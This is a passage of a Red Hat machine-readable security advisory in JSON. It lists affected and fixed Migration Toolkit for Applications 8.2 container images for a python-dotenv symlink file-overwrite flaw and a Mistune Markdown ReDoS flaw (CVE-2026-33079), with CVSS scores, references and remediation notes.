"url": "https://github.com/theskumar/python-dotenv/releases/tag/v1.2.2"
},
{
"category": "external",
"summary": "https://github.com/theskumar/python-dotenv/security/advisories/GHSA-mf9w-mj56-hr94",
"url": "https://github.com/theskumar/python-dotenv/security/advisories/GHSA-mf9w-mj56-hr94"
}
],
"release_date": "2026-04-20T16:25:12.302000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-dotenv: python-dotenv: Arbitrary file overwrite via symbolic link following"
},
{
"cve": "CVE-2026-33079",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-05-06T18:01:13.818581+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2467298"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Mistune, a Markdown parser. This vulnerability, known as Regular Expression Denial of Service (ReDoS), exists in the `LINK_TITLE_RE` regular expression. A remote attacker can exploit this by providing specially crafted Markdown input, which causes the regular expression engine to engage in catastrophic backtracking. This leads to significant CPU consumption, making applications that use Mistune unresponsive and resulting in a Denial of Service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "mistune: Mistune: Regular Expression Denial of Service (ReDoS) via crafted Markdown input",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important flaw in the Mistune Markdown parser can lead to a denial of service in Red Hat OpenShift AI and Migration Toolkit for Applications. A remote attacker can exploit a Regular Expression Denial of Service (ReDoS) vulnerability by submitting specially crafted Markdown input, causing excessive CPU consumption and rendering affected applications unresponsive. This impact is significant as it directly affects the availability of services that process untrusted Markdown content.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33079"
},
{
"category": "external",
"summary": "RHBZ#2467298",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467298"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33079",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33079"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33079",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33079"
},
{
"category": "external",
"summary": "https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L20-L25",
"url": "https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L20-L25"
},
{
"category": "external",
"summary": "https://github.com/lepture/mistune/security/advisories/GHSA-8mp2-v27r-99xp",
"url": "https://github.com/lepture/mistune/security/advisories/GHSA-8mp2-v27r-99xp"
}
],
"release_date": "2026-05-06T17:25:09.026000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
